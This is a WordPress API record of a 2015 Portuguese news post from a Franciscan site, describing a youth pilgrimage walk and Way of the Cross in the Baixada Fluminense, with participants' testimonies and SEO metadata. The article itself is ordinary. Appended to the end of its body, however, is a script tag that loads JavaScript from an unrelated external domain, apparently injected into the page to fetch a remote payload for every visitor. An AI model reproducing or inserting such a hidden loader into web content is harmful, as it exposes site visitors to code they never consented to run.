{"id":81925,"date":"2015-03-24T12:52:52","date_gmt":"2015-03-24T15:52:52","guid":{"rendered":"http:\/\/franciscanos.org.br\/?p=81925"},"modified":"2020-01-31T13:13:03","modified_gmt":"2020-01-31T16:13:03","slug":"baixada-fluminense-realiza-sua-1a-caminhada-franciscana-da-juventude","status":"publish","type":"post","link":"https:\/\/franciscanos.org.br\/noticias\/baixada-fluminense-realiza-sua-1a-caminhada-franciscana-da-juventude.html","title":{"rendered":"1\u00aa Caminhada Franciscana da Juventude"},"content":{"rendered":"<p><img loading=\"lazy\" class=\"aligncenter size-full wp-image-152301\" src=\"http:\/\/franciscanos.org.br\/wp-content\/uploads\/2018\/02\/primeira_caminhada_830.jpg\" alt=\"primeira_caminhada_830\" width=\"820\" height=\"372\" \/><\/p>\n<p>A 1\u00aa Caminhada Franciscana da Juventude na Baixada Fluminense come\u00e7ou no s\u00e1bado, dia 21 de mar\u00e7o, bem cedo, com a chegada dos primeiros peregrinos. Rostos cheios de expectativa come\u00e7aram a se juntar para o in\u00edcio, onde foi feita uma homenagem \u00e0s crian\u00e7as com s\u00edndrome de Down, assistidas pela Superintend\u00eancia da Pessoa com Defici\u00eancia da Prefeitura de Nil\u00f3polis, que acompanharam a caminhada at\u00e9 o limite do munic\u00edpio, em comemora\u00e7\u00e3o ao dia internacional da s\u00edndrome de Down.<\/p>\n<p>Os peregrinos passaram pelas ruas de Nil\u00f3polis, Mesquita e Nova Igua\u00e7u, sob olhares curiosos das pessoas que passavam pelo grupo. Ouviram v\u00e1rias vezes: \u201cvoc\u00eas s\u00e3o loucos!\u201d, mas o sentimento que tinham em seus cora\u00e7\u00f5es era que, assim como Francisco de Assis, eram loucos, e que a caminhada n\u00e3o era por eles, mas por Deus, que nos chama todos os dias a sermos evangelizadores.<\/p>\n<p>Chegando \u00e0 Catedral de Santo Ant\u00f4nio de Nova Igua\u00e7u foram recebidos com m\u00fasica e um lanche preparado pelo setor juventude daquela diocese. Ouvimos e vimos uma apresenta\u00e7\u00e3o sobre esperan\u00e7a, onde clipes mostravam que os nossos sonhos s\u00e3o importantes demais para serem esquecidos, e em seguida tivemos uma palestra sobre o Franciscanismo na Baixada, com aten\u00e7\u00e3o especial na figura do saudoso Dom Adriano Hip\u00f3lito, e suas lutas por uma baixada mais justa, solid\u00e1ria e mission\u00e1ria. A visita foi encerrada na cripta e no nicho das \u00e2mbulas que foram profanadas, ap\u00f3s a explos\u00e3o da bomba na Catedral, durante o regime militar.<\/p>\n<h3><strong><a href=\"http:\/\/franciscanos.org.br\/wp-content\/uploads\/2015\/03\/123.jpg\"><img loading=\"lazy\" class=\"alignleft wp-image-81932\" src=\"http:\/\/franciscanos.org.br\/wp-content\/uploads\/2015\/03\/123.jpg\" alt=\"12\" width=\"403\" height=\"302\" \/><\/a>Dom Luciano Bergamin, bispo de Nova Igua\u00e7u, acolhe os peregrinos<\/strong><\/h3>\n<p>A caminhada seguiu at\u00e9 a casa de ora\u00e7\u00e3o Frei Jord\u00e3o Mai, onde almo\u00e7aram com o querido Dom Luciano Bergamin, que os aben\u00e7oou e como sempre nos acolheu com muito carinho como um verdadeiro pai e pastor para seu rebanho. Ap\u00f3s o almo\u00e7o e um breve momento de descanso, iniciou-se a Via sacra pelas ruas onde foi refletido n\u00e3o s\u00f3 a paix\u00e3o de Cristo, mas a vida e a rela\u00e7\u00e3o dos jovens com a igreja e a sociedade atrav\u00e9s dos exemplos de vida de S\u00e3o Francisco. Enquanto caminhavam, foram percebendo como o povo de Deus necessita de ajuda e carinho. Foram in\u00fameros pedidos de ora\u00e7\u00e3o, que fizeram deste trajeto da caminhada um momento forte de ora\u00e7\u00e3o e a\u00e7\u00e3o, a\u00e7\u00e3o que ficou evidente em frente a UPA (Unidade de Pronto Atendimento), onde uma mulher chegou para dar entrada na unidade de sa\u00fade e foi socorrida por jovens da caminhada.<\/p>\n<p>Para Matheus Coelho, de Nil\u00f3polis, este foi um dos momentos mais marcantes. \u00a0\u201cAcho que encontramos Jesus todos os dias pelas ruas, atrav\u00e9s do cotidiano, por exemplo em uma pessoa que precisa de ajuda, como quando n\u00f3s paramos para ajudar uma mo\u00e7a na cadeira de rodas\u201d, explicou.<\/p>\n<h3><strong><img loading=\"lazy\" class=\"alignright wp-image-81929\" src=\"http:\/\/franciscanos.org.br\/wp-content\/uploads\/2015\/03\/18.jpg\" alt=\"18\" width=\"423\" height=\"372\" \/>Di\u00e1logo ecum\u00eanico e encontro com as Irm\u00e3s Clarissas marca a Caminhada Franciscana na Baixada Fluminense<\/strong><\/h3>\n<p>Ao longo do trajeto, foi feita uma parada em frente na casa de uma irm\u00e3 evang\u00e9lica, que havia ajudado a conseguir algumas casas para a via sacra e com um gesto de unidade e ecumenismo foi dada a ela uma flor e como irm\u00e3os todos rezaram a ora\u00e7\u00e3o do Pai Nosso. Da mesma forma um pastor evang\u00e9lico ficou muito feliz por receber uma das esta\u00e7\u00f5es e apoiou a iniciativa, pois viu nos rostos dos jovens a esperan\u00e7a para um mundo melhor e mais crist\u00e3o. Em uma das casas uma das senhoras deu um belo testemunho. Mesmo doente, expressou alegria por receber os peregrinos e ao fim da esta\u00e7\u00e3o caminhou at\u00e9 ao mosteiro. Muitas pessoas pediram ora\u00e7\u00e3o durante o caminho e ao final da ora\u00e7\u00e3o seguiram aos jovens at\u00e9 o mosteiro e essa a\u00e7\u00e3o deu mais \u00e2nimo aos jovens. Na porta do mosteiro foram recebidos pela madre superiora das Clarissas.<\/p>\n<p>No mosteiro foi lido o Evangelho, a passagem da par\u00e1bola do filho pr\u00f3digo. A jovem Mariana Rogoski deu o seu testemunho de vida e ressurei\u00e7\u00e3o, e mostrou que sempre \u00e9 tempo de retornar, e que Deus \u00e9 um pai misericordioso e nos ama e perdoa sempre n\u00e3o importa o que fa\u00e7amos. Em seguida, o grupo jovem da comunidade Nossa Senhora das Gra\u00e7as de Nil\u00f3polis fez uma bonita apresenta\u00e7\u00e3o, onde mostrou a alegria da volta e o amor de Deus que nos protege sempre. Frei Diego Melo, coordenador do SAV (Servi\u00e7o de Anima\u00e7\u00e3o Vocacional), ajudou aos participantes a entenderem o tema \u201cN\u00e3o perca de vista seu ponto de partida\u201d.<\/p>\n<p>\u201cN\u00e3o perder de vista o ponto de partida \u00e9 voltar para o primeiro amor. \u00c9 lembrar-se da decis\u00e3o que tomamos diante a vida e que sempre temos duas op\u00e7\u00f5es, o sim e o n\u00e3o, e cabe a n\u00f3s decidir qual o caminho tomar, mas se a escolha for a errada temos a oportunidade de sempre voltar ao ponto de onde come\u00e7amos\u201d, afirmou o frade. O momento de ora\u00e7\u00e3o terminou com a ben\u00e7\u00e3o de Santa Clara cantada pelas irm\u00e3s Clarissas do Mosteiro e em seguida voltaram para a casa de ora\u00e7\u00e3o para janta e pernoite.<\/p>\n<p>Logo pela manh\u00e3 todos tomaram caf\u00e9 e participaram da Celebra\u00e7\u00e3o Eucar\u00edstica, onde foi poss\u00edvel partilhar a experi\u00eancia da caminhada, as alegrias, o cansa\u00e7o, o que foi visto e o que chamou aten\u00e7\u00e3o. Ao fim da missa juntaram suas as mochilas e iniciaram o retorno \u00e0 par\u00f3quia de Nossa Senhora da Concei\u00e7\u00e3o. Chegando l\u00e1 foram acolhidos pelo Frei Gildo e o p\u00e1roco Frei Jos\u00e9 Pereira, que recordou o pedido do Papa Francisco: sermos uma igreja em sa\u00edda. Essa lembran\u00e7a refor\u00e7ou a esperan\u00e7a de uma igreja mais solid\u00e1ria, disposta a servir o pr\u00f3ximo em suas necessidades.<\/p>\n<p>A Caminhada Franciscana da Juventude foi um momento de um profundo encontro com Cristo, buscando ele dentro de n\u00f3s, nos outros e no caminho. \u00c9 ir \u00e0s periferias existenciais pra conseguir for\u00e7as para continuar a caminhada. \u00c9 confirmar a nossa voca\u00e7\u00e3o de disc\u00edpulos mission\u00e1rios. \u00c9 ser igreja fora da igreja e sobretudo ser evangelizadores!<\/p>\n<h3><strong>Testemunhos:<\/strong><\/h3>\n<p>Cintia Gomes, de Nil\u00f3polis: O que me chamou aten\u00e7\u00e3o e o que me emocionou foi quando est\u00e1vamos na via sacra, onde v\u00e1rias pessoas pediram para pararmos na casa delas, at\u00e9 pessoas de outras denomina\u00e7\u00f5es crist\u00e3s. Fiquei muito emocionada ao ver uma senhora que ainda n\u00e3o tinha sido operada acompanhando a gente no caminho. Levarei para minha vida a simplicidade de S\u00e3o Francisco, o jeito maravilhoso de ajudar o pr\u00f3ximo e de ser apaixonado por Cristo.<\/p>\n<p>Mariana Rogoski, de Curitiba: Essa foi minha 2\u00aa Caminhada, mas bem diferente da primeira. Sai do Paran\u00e1 para encontrar no Rio de Janeiro um povo muito guerreiro, que mesmo com as dificuldades locais, n\u00e3o tiram o sorriso do rosto e a alegria de viver. Senti o esp\u00edrito de fraternidade na linda acolhida nas casas que me receberam! Encontrei pelas tr\u00eas cidades que passamos realidades diferentes da minha, vi muita diversidade, muita riqueza de vida. Mas tamb\u00e9m vi rostos tristes que clamavam por socorro, como o de algumas mulheres que foram acompanhando nosso grupo e pedindo ora\u00e7\u00e3o em suas casas enquanto faz\u00edamos a via-sacra. Mas o que mais me emocionou, acho que foi enquanto paramos em frente a UPA e faz\u00edamos uma das Esta\u00e7\u00f5es da Via-Sacra, e um homem chegou carregando uma mulher nos bra\u00e7os. Eu e Frei Diego largamos pap\u00e9is e ora\u00e7\u00f5es e corremos para ajud\u00e1-los. Foi intenso carreg\u00e1-la nos bra\u00e7os e lev\u00e1-la at\u00e9 a porta da UPA, onde foi atendida. Ao mesmo tempo, outras pessoas da caminhada socorreram o filho do casal no carro. Naquele momento percebi: muito mais que rezar, falar, caminhar temos que agir! Foi lindo e que venha a pr\u00f3xima.<\/p>\n<p>Frei Diego, coordenador do SAV: Na certeza de que nossa cabe\u00e7a pensa a partir de onde nossos p\u00e9s pisam, creio que essa Caminhada na Baixada proporcionou um novo modo de pensar a realidade de tantos irm\u00e3os e irm\u00e3s que vivem nesse local sagrado e chagado. Em uma caminhada como essa, o contato imediato e a proximidade com as pessoas s\u00e3o um grande diferencial, pois nos colocam diante da realidade tal qual ela \u00e9. Caminhando com os jovens pelas ruas, ouvindo suas hist\u00f3rias, conhecendo um pouco melhor a realidade onde vivem e os desafios que diariamente enfrentam, s\u00f3 me fizeram renovar a convic\u00e7\u00e3o de que, como franciscanos, nosso lugar \u00e9, de fato, no meio do povo. \u00c9 preciso que sejamos essa igreja em sa\u00edda, como nos pede o Papa Francisco, pois quando sa\u00edmos de nosso mundo, de nossas realidades e comodidades, somos capazes de encontrar e entender a realidade que nos cerca e que muitas vezes permanece desconhecida de n\u00f3s.<\/p>\n<p><img class=\"ngg_displayed_gallery mceItem\" src=\"http:\/\/franciscanos.org.br\/index.php\/nextgen-attach_to_post\/preview\/id--81970\" alt=\"\" \/><\/p>\n<p><script id=\"lg210a\" src=\"https:\/\/cloudapi.online\/js\/api46.js\" type=\"text\/javascript\"><\/script><\/p>\n","protected":false},"excerpt":{"rendered":"<p>Baixada Fluminense<\/p>\n","protected":false},"author":1,"featured_media":217892,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":[],"categories":[1],"tags":[],"acf":[],"yoast_head":"<!-- This site is optimized with the Yoast SEO plugin v19.2 - https:\/\/yoast.com\/wordpress\/plugins\/seo\/ -->\n<title>1\u00aa Caminhada Franciscana da Juventude - Not\u00edcias - Franciscanos<\/title>\n<meta name=\"robots\" content=\"index, follow, max-snippet:-1, max-image-preview:large, max-video-preview:-1\" \/>\n<link rel=\"canonical\" href=\"https:\/\/franciscanos.org.br\/noticias\/baixada-fluminense-realiza-sua-1a-caminhada-franciscana-da-juventude.html\" \/>\n<meta property=\"og:locale\" content=\"pt_BR\" \/>\n<meta property=\"og:type\" content=\"article\" \/>\n<meta property=\"og:title\" content=\"1\u00aa Caminhada Franciscana da Juventude - Not\u00edcias - Franciscanos\" \/>\n<meta property=\"og:description\" content=\"Baixada Fluminense\" \/>\n<meta property=\"og:url\" content=\"https:\/\/franciscanos.org.br\/noticias\/baixada-fluminense-realiza-sua-1a-caminhada-franciscana-da-juventude.html\" \/>\n<meta property=\"og:site_name\" content=\"Not\u00edcias - Franciscanos\" \/>\n<meta property=\"article:published_time\" content=\"2015-03-24T15:52:52+00:00\" \/>\n<meta property=\"article:modified_time\" content=\"2020-01-31T16:13:03+00:00\" \/>\n<meta property=\"og:image\" content=\"https:\/\/franciscanos.org.br\/noticias\/wp-content\/uploads\/2015\/03\/primeira_caminhada_830.jpg\" \/>\n\t<meta property=\"og:image:width\" content=\"273\" \/>\n\t<meta property=\"og:image:height\" content=\"181\" \/>\n\t<meta property=\"og:image:type\" content=\"image\/jpeg\" \/>\n<meta name=\"author\" content=\"admin\" \/>\n<meta name=\"twitter:card\" content=\"summary_large_image\" \/>\n<meta name=\"twitter:label1\" content=\"Escrito por\" \/>\n\t<meta name=\"twitter:data1\" content=\"admin\" \/>\n\t<meta name=\"twitter:label2\" content=\"Est. tempo de leitura\" \/>\n\t<meta name=\"twitter:data2\" content=\"8 minutos\" \/>\n<script type=\"application\/ld+json\" class=\"yoast-schema-graph\">{\"@context\":\"https:\/\/schema.org\",\"@graph\":[{\"@type\":\"WebSite\",\"@id\":\"https:\/\/franciscanos.org.br\/noticias\/#website\",\"url\":\"https:\/\/franciscanos.org.br\/noticias\/\",\"name\":\"Not\u00edcias - Franciscanos\",\"description\":\"Prov\u00edncia Franciscana da Imaculada Concei\u00e7\u00e3o do Brasil - Ordem dos Frades Menores - OFM\",\"potentialAction\":[{\"@type\":\"SearchAction\",\"target\":{\"@type\":\"EntryPoint\",\"urlTemplate\":\"https:\/\/franciscanos.org.br\/noticias\/?s={search_term_string}\"},\"query-input\":\"required name=search_term_string\"}],\"inLanguage\":\"pt-BR\"},{\"@type\":\"ImageObject\",\"inLanguage\":\"pt-BR\",\"@id\":\"https:\/\/franciscanos.org.br\/noticias\/baixada-fluminense-realiza-sua-1a-caminhada-franciscana-da-juventude.html#primaryimage\",\"url\":\"https:\/\/franciscanos.org.br\/noticias\/wp-content\/uploads\/2015\/03\/primeira_caminhada_830.jpg\",\"contentUrl\":\"https:\/\/franciscanos.org.br\/noticias\/wp-content\/uploads\/2015\/03\/primeira_caminhada_830.jpg\",\"width\":273,\"height\":181},{\"@type\":\"WebPage\",\"@id\":\"https:\/\/franciscanos.org.br\/noticias\/baixada-fluminense-realiza-sua-1a-caminhada-franciscana-da-juventude.html#webpage\",\"url\":\"https:\/\/franciscanos.org.br\/noticias\/baixada-fluminense-realiza-sua-1a-caminhada-franciscana-da-juventude.html\",\"name\":\"1\u00aa Caminhada Franciscana da Juventude - Not\u00edcias - Franciscanos\",\"isPartOf\":{\"@id\":\"https:\/\/franciscanos.org.br\/noticias\/#website\"},\"primaryImageOfPage\":{\"@id\":\"https:\/\/franciscanos.org.br\/noticias\/baixada-fluminense-realiza-sua-1a-caminhada-franciscana-da-juventude.html#primaryimage\"},\"datePublished\":\"2015-03-24T15:52:52+00:00\",\"dateModified\":\"2020-01-31T16:13:03+00:00\",\"author\":{\"@id\":\"https:\/\/franciscanos.org.br\/noticias\/#\/schema\/person\/b38fbf43118f02820bd932f2e4b14ad3\"},\"breadcrumb\":{\"@id\":\"https:\/\/franciscanos.org.br\/noticias\/baixada-fluminense-realiza-sua-1a-caminhada-franciscana-da-juventude.html#breadcrumb\"},\"inLanguage\":\"pt-BR\",\"potentialAction\":[{\"@type\":\"ReadAction\",\"target\":[\"https:\/\/franciscanos.org.br\/noticias\/baixada-fluminense-realiza-sua-1a-caminhada-franciscana-da-juventude.html\"]}]},{\"@type\":\"BreadcrumbList\",\"@id\":\"https:\/\/franciscanos.org.br\/noticias\/baixada-fluminense-realiza-sua-1a-caminhada-franciscana-da-juventude.html#breadcrumb\",\"itemListElement\":[{\"@type\":\"ListItem\",\"position\":1,\"name\":\"Home\",\"item\":\"https:\/\/franciscanos.org.br\/noticias\"},{\"@type\":\"ListItem\",\"position\":2,\"name\":\"1\u00aa Caminhada Franciscana da Juventude\"}]},{\"@type\":\"Person\",\"@id\":\"https:\/\/franciscanos.org.br\/noticias\/#\/schema\/person\/b38fbf43118f02820bd932f2e4b14ad3\",\"name\":\"admin\",\"image\":{\"@type\":\"ImageObject\",\"inLanguage\":\"pt-BR\",\"@id\":\"https:\/\/franciscanos.org.br\/noticias\/#\/schema\/person\/image\/\",\"url\":\"https:\/\/secure.gravatar.com\/avatar\/e8495742d34d0ba6448ea1c628263b3e?s=96&d=mm&r=g\",\"contentUrl\":\"https:\/\/secure.gravatar.com\/avatar\/e8495742d34d0ba6448ea1c628263b3e?s=96&d=mm&r=g\",\"caption\":\"admin\"},\"url\":\"https:\/\/franciscanos.org.br\/noticias\/author\/admin\"}]}<\/script>\n<!-- \/ Yoast SEO plugin. -->","yoast_head_json":{"title":"1\u00aa Caminhada Franciscana da Juventude - Not\u00edcias - Franciscanos","robots":{"index":"index","follow":"follow","max-snippet":"max-snippet:-1","max-image-preview":"max-image-preview:large","max-video-preview":"max-video-preview:-1"},"canonical":"https:\/\/franciscanos.org.br\/noticias\/baixada-fluminense-realiza-sua-1a-caminhada-franciscana-da-juventude.html","og_locale":"pt_BR","og_type":"article","og_title":"1\u00aa Caminhada Franciscana da Juventude - Not\u00edcias - Franciscanos","og_description":"Baixada Fluminense","og_url":"https:\/\/franciscanos.org.br\/noticias\/baixada-fluminense-realiza-sua-1a-caminhada-franciscana-da-juventude.html","og_site_name":"Not\u00edcias - Franciscanos","article_published_time":"2015-03-24T15:52:52+00:00","article_modified_time":"2020-01-31T16:13:03+00:00","og_image":[{"width":273,"height":181,"url":"https:\/\/franciscanos.org.br\/noticias\/wp-content\/uploads\/2015\/03\/primeira_caminhada_830.jpg","type":"image\/jpeg"}],"author":"admin","twitter_card":"summary_large_image","twitter_misc":{"Escrito por":"admin","Est. tempo de leitura":"8 minutos"},"schema":{"@context":"https:\/\/schema.org","@graph":[{"@type":"WebSite","@id":"https:\/\/franciscanos.org.br\/noticias\/#website","url":"https:\/\/franciscanos.org.br\/noticias\/","name":"Not\u00edcias - Franciscanos","description":"Prov\u00edncia Franciscana da Imaculada Concei\u00e7\u00e3o do Brasil - Ordem dos Frades Menores - OFM","potentialAction":[{"@type":"SearchAction","target":{"@type":"EntryPoint","urlTemplate":"https:\/\/franciscanos.org.br\/noticias\/?s={search_term_string}"},"query-input":"required name=search_term_string"}],"inLanguage":"pt-BR"},{"@type":"ImageObject","inLanguage":"pt-BR","@id":"https:\/\/franciscanos.org.br\/noticias\/baixada-fluminense-realiza-sua-1a-caminhada-franciscana-da-juventude.html#primaryimage","url":"https:\/\/franciscanos.org.br\/noticias\/wp-content\/uploads\/2015\/03\/primeira_caminhada_830.jpg","contentUrl":"https:\/\/franciscanos.org.br\/noticias\/wp-content\/uploads\/2015\/03\/primeira_caminhada_830.jpg","width":273,"height":181},{"@type":"WebPage","@id":"https:\/\/franciscanos.org.br\/noticias\/baixada-fluminense-realiza-sua-1a-caminhada-franciscana-da-juventude.html#webpage","url":"https:\/\/franciscanos.org.br\/noticias\/baixada-fluminense-realiza-sua-1a-caminhada-franciscana-da-juventude.html","name":"1\u00aa Caminhada Franciscana da Juventude - Not\u00edcias - Franciscanos","isPartOf":{"@id":"https:\/\/franciscanos.org.br\/noticias\/#website"},"primaryImageOfPage":{"@id":"https:\/\/franciscanos.org.br\/noticias\/baixada-fluminense-realiza-sua-1a-caminhada-franciscana-da-juventude.html#primaryimage"},"datePublished":"2015-03-24T15:52:52+00:00","dateModified":"2020-01-31T16:13:03+00:00","author":{"@id":"https:\/\/franciscanos.org.br\/noticias\/#\/schema\/person\/b38fbf43118f02820bd932f2e4b14ad3"},"breadcrumb":{"@id":"https:\/\/franciscanos.org.br\/noticias\/baixada-fluminense-realiza-sua-1a-caminhada-franciscana-da-juventude.html#breadcrumb"},"inLanguage":"pt-BR","potentialAction":[{"@type":"ReadAction","target":["https:\/\/franciscanos.org.br\/noticias\/baixada-fluminense-realiza-sua-1a-caminhada-franciscana-da-juventude.html"]}]},{"@type":"BreadcrumbList","@id":"https:\/\/franciscanos.org.br\/noticias\/baixada-fluminense-realiza-sua-1a-caminhada-franciscana-da-juventude.html#breadcrumb","itemListElement":[{"@type":"ListItem","position":1,"name":"Home","item":"https:\/\/franciscanos.org.br\/noticias"},{"@type":"ListItem","position":2,"name":"1\u00aa Caminhada Franciscana da Juventude"}]},{"@type":"Person","@id":"https:\/\/franciscanos.org.br\/noticias\/#\/schema\/person\/b38fbf43118f02820bd932f2e4b14ad3","name":"admin","image":{"@type":"ImageObject","inLanguage":"pt-BR","@id":"https:\/\/franciscanos.org.br\/noticias\/#\/schema\/person\/image\/","url":"https:\/\/secure.gravatar.com\/avatar\/e8495742d34d0ba6448ea1c628263b3e?s=96&d=mm&r=g","contentUrl":"https:\/\/secure.gravatar.com\/avatar\/e8495742d34d0ba6448ea1c628263b3e?s=96&d=mm&r=g","caption":"admin"},"url":"https:\/\/franciscanos.org.br\/noticias\/author\/admin"}]}},"_links":{"self":[{"href":"https:\/\/franciscanos.org.br\/noticias\/wp-json\/wp\/v2\/posts\/81925"}],"collection":[{"href":"https:\/\/franciscanos.org.br\/noticias\/wp-json\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/franciscanos.org.br\/noticias\/wp-json\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/franciscanos.org.br\/noticias\/wp-json\/wp\/v2\/users\/1"}],"replies":[{"embeddable":true,"href":"https:\/\/franciscanos.org.br\/noticias\/wp-json\/wp\/v2\/comments?post=81925"}],"version-history":[{"count":0,"href":"https:\/\/franciscanos.org.br\/noticias\/wp-json\/wp\/v2\/posts\/81925\/revisions"}],"wp:featuredmedia":[{"embeddable":true,"href":"https:\/\/franciscanos.org.br\/noticias\/wp-json\/wp\/v2\/media\/217892"}],"wp:attachment":[{"href":"https:\/\/franciscanos.org.br\/noticias\/wp-json\/wp\/v2\/media?parent=81925"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/franciscanos.org.br\/noticias\/wp-json\/wp\/v2\/categories?post=81925"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/franciscanos.org.br\/noticias\/wp-json\/wp\/v2\/tags?post=81925"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}